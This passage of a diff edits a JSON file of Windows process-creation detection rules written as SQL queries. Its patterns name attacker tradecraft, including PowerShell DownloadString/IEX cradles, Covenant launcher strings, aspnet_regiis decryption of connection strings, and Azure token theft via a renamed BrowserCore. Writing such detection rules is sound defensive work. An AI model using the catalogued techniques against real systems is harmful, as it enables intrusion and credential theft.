LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_susp_cab_options.yml" + "filename": "proc_creation_win_powershell_downgrade_attack.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, 
@sblmsrsn, @oscd_initiative", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", - "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", - "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. 
This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", + "tags": [ + "attack.execution", + "attack.t1059.001" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", - "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", - "author": "Florian Roth (Nextron Systems)", + "title": "VsCode Child Process Anomaly", + "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. 
This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\code.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'%C:\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", - "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "PowerShell Script Run in AppData", + "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "status": "experimental", + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" }, { - "title": "PUA - Potential PE Metadata Tamper Using Rcedit", - "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - 
"description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", - "author": "Micah Babinski", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036", - "attack.t1027.005", - "attack.t1027" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate use of the tool by administrators or users to update metadata of a binary" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_rcedit_execution.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": 
"c09dad97-1c78-4f71-b127-7edb2b8e491a", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\')) AND NOT ((NewProcessName = '') OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName IN ('-', '')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%.scr' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' 
ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process 
characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "status": "test", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", - "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. 
Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "status": "experimental", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unknown" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_query_registry.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Suspicious Rundll32 Invoking Inline VBScript", - "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "status": "test", - 
"description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_inline_vbs.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", - "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "status": "test", + "description": "Detects suspicious Splwow64.exe 
process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", - "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "status": "experimental", + "description": "Detects suspicious shell spawned from Java host process (e.g. 
log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", - "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "title": "Arbitrary Binary Execution Using GUP Utility", + "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", "status": "experimental", - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.execution" ], "falsepositives": [ - "DataSvcUtil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ "Other parent binaries using GUP not currently identified" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\gup.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" ], - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Suspicious CodePage Switch Via CHCP", + "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "status": "test", + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1036", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Administrative activity (adjust code pages according to your organization's region)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' 
